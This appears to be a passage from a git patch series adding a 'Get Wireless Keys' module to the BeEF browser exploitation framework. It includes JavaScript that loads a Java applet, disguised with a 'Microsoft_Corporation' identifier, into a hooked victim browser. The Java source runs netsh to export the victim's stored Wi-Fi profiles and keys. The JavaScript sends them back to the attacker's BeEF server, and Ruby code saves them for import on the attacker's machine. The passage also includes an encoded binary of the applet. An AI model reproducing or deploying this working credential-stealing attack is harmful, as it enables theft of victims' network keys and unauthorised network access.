+ return result; + } + + public static boolean isWindows() { + String os = System.getProperty("os.name").toLowerCase(); + return (os.indexOf("win") >= 0); + } + + /** + public static void main(String[] args) { + if (isWindows()) { + String osVersion= System.getProperty("os.version"); + System.out.println(osVersion); + if(osVersion.equals("6.0") || osVersion.equals("6.1")){ + result=getWindows(); + } + } else { + result = "OS is not supported"; + } + System.out.println(result); + } + **/ +} From 5cb1ad3d534d40ee3e460959d01df8a4c4ef8a40 Mon Sep 17 00:00:00 2001 From: milo2012 Date: Sun, 11 Mar 2012 11:38:47 -0400 Subject: [PATCH 9/9] Module for Issue 639 - Retrieving Clear Text Wireless Keys from Compromised Systems --- modules/host/get_wireless_keys/command.js | 30 +++++ modules/host/get_wireless_keys/config.yaml | 26 ++++ modules/host/get_wireless_keys/module.rb | 35 ++++++ .../wirelessZeroConfig.class | Bin 0 -> 2818 bytes .../get_wireless_keys/wirelessZeroConfig.jar | Bin 0 -> 3285 bytes .../get_wireless_keys/wirelessZeroConfig.java | 113 ++++++++++++++++++ 6 files changed, 204 insertions(+) create mode 100644 modules/host/get_wireless_keys/command.js create mode 100644 modules/host/get_wireless_keys/config.yaml create mode 100644 modules/host/get_wireless_keys/module.rb create mode 100644 modules/host/get_wireless_keys/wirelessZeroConfig.class create mode 100644 modules/host/get_wireless_keys/wirelessZeroConfig.jar create mode 100644 modules/host/get_wireless_keys/wirelessZeroConfig.java diff --git a/modules/host/get_wireless_keys/command.js b/modules/host/get_wireless_keys/command.js new file mode 100644 index 000000000..54aec9505 --- /dev/null +++ b/modules/host/get_wireless_keys/command.js @@ -0,0 +1,30 @@ +// +// Copyright 2011 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +beef.execute(function() { + var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/wirelessZeroConfig.jar'; + var applet_id = '<%= @applet_id %>'; + var applet_name = '<%= @applet_name %>'; + var output; + beef.dom.attachApplet(applet_id, 'Microsoft_Corporation', 'wirelessZeroConfig' , + null, applet_archive, null); + output = document.Microsoft_Corporation.getInfo(); + if (output) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+output); + } + beef.dom.detachApplet('wirelessZeroConfig'); +}); + + diff --git a/modules/host/get_wireless_keys/config.yaml b/modules/host/get_wireless_keys/config.yaml new file mode 100644 index 000000000..9529b4ec5 --- /dev/null +++ b/modules/host/get_wireless_keys/config.yaml @@ -0,0 +1,26 @@ +# +# Copyright 2011 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + get_wireless_keys: + enable: true + category: "Host" + name: "Get Wireless Keys" + description: "This module will retrieve the wireless profiles from the target computer.
You will need to copy the results to 'exported_wlan_profiles.xml' and then reimport back into your Windows Vista/7 computers by running the command netsh wlan add profile filename=\"exported_wlan_profiles.xml\".
After that, just launch and connect to the wireless network without any password prompt.

For more information, refer to http://pauldotcom.com/2012/03/retrieving-wireless-keys-from.html" + authors: ["keith_lee @keith55 http://milo2012.wordpress.com"] + target: + working: ["IE"] + user_notify: ["C", "S", "O", "FF"] diff --git a/modules/host/get_wireless_keys/module.rb b/modules/host/get_wireless_keys/module.rb new file mode 100644 index 000000000..0a3f75be2 --- /dev/null +++ b/modules/host/get_wireless_keys/module.rb @@ -0,0 +1,35 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +class Get_wireless_keys < BeEF::Core::Command + + def pre_send + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/host/get_wireless_keys/wirelessZeroConfig.jar','/wirelessZeroConfig','jar') + end + + def post_execute + content = {} + content['result'] = @datastore['result'].to_s + save content + f = File.open("exported_wlan_profiles.xml","w+") + f.write((@datastore['results']).sub("result=","")) + writeToResults = Hash.new + writeToResults['data'] = "Please import "+Dir.pwd+"/exported_wlan_profiles.xml into your windows machine" + BeEF::Core::Models::Command.save_result(@datastore['beefhook'], @datastore['cid'] , @friendlyname, writeToResults) + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/wirelessZeroConfig.jar') + end + +end + diff --git a/modules/host/get_wireless_keys/wirelessZeroConfig.class b/modules/host/get_wireless_keys/wirelessZeroConfig.class new file mode 100644 index 0000000000000000000000000000000000000000..cb5a0838e11cb355019ff1b9bc333bc4d5c053cb GIT binary patch literal 2818 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 VMyif9G>p``Ks{gtRZ$w6{{Ulji_`!B literal 0 HcmV?d00001 diff --git a/modules/host/get_wireless_keys/wirelessZeroConfig.java b/modules/host/get_wireless_keys/wirelessZeroConfig.java new file mode 100644 index 000000000..e0c349785 --- /dev/null +++ b/modules/host/get_wireless_keys/wirelessZeroConfig.java @@ -0,0 +1,113 @@ +import java.io.*; +import java.util.*; +import java.net.*; +import java.applet.*; + +// Keith Lee +// Twitter: @keith55 +// http://milo2012.wordpress.com +// keith.lee2012[at]gmail.com + +public class wirelessZeroConfig extends Applet{ + public static String result = ""; + + public wirelessZeroConfig(){ + super(); + return; + } + public static String getInfo() { + return result; + } + + public void init() { + if (isWindows()) { + String osVersion= System.getProperty("os.version"); + if(osVersion.equals("6.0") || osVersion.equals("6.1")){ + result=getWindows(); + } + } else { + result = "OS is not supported"; + } + } + + public static String getWindows(){ + String cmd1 = "netsh wlan show profiles"; + String cmd2 = "netsh wlan export profile name="; + String keyword1 = "User profiles"; + String wlanProfileArr[]; + String wlanProfileName; + int match = 0; + int count = 0; + ArrayList profileList = new ArrayList(); + try { + //Get wlan profile names + Process p1 = Runtime.getRuntime().exec(cmd1); + BufferedReader in1 = new BufferedReader(new InputStreamReader(p1.getInputStream())); + String line = null; + //Checks if string match "User profiles" + while ((line = in1.readLine()) != null) { + //Checks if string match "User profiles" + if(match==0){ + if(line.toLowerCase().contains(keyword1.toLowerCase())){ + match=1; + } + } + if(match==1){ + if(count>1){ + //If string matches the keyword "User Profiles" + line = (line.replaceAll("\\s+$","").replaceAll("^\\s+", "")); + if(line.length()>0){ + wlanProfileName = (line.split(":")[1]).replaceAll("\\s+$","").replaceAll("^\\s+", "");; + profileList.add(wlanProfileName); + } + } + count+=1; + } + } + in1.close(); + } catch (IOException e) { } + + try{ + //Export WLAN Profile to XML file + for(Iterator iterator = profileList.iterator(); iterator.hasNext();){ + String profileName = iterator.next().toString(); + Process p2 = Runtime.getRuntime().exec(cmd2+'"'+profileName+'"'); + //Check if exported xml exists + File f = new File("Wireless Network Connection-"+profileName+".xml"); + if(f.exists()){ + //Read contents of XML file into results variable + FileInputStream fstream = new FileInputStream(f); + DataInputStream in2 = new DataInputStream(fstream); + BufferedReader br = new BufferedReader(new InputStreamReader(in2)); + String xmlToStr; + while((xmlToStr = br.readLine()) != null){ + result+=xmlToStr; + } + in2.close(); + } + } + } catch (IOException e) { + } + return result; + } + + public static boolean isWindows() { + String os = System.getProperty("os.name").toLowerCase(); + return (os.indexOf("win") >= 0); + } + + /** + public static void main(String[] args) { + if (isWindows()) { + String osVersion= System.getProperty("os.version"); + System.out.println(osVersion); + if(osVersion.equals("6.0") || osVersion.equals("6.1")){ + result=getWindows(); + } + } else { + result = "OS is not supported"; + } + System.out.println(result); + } + **/ +}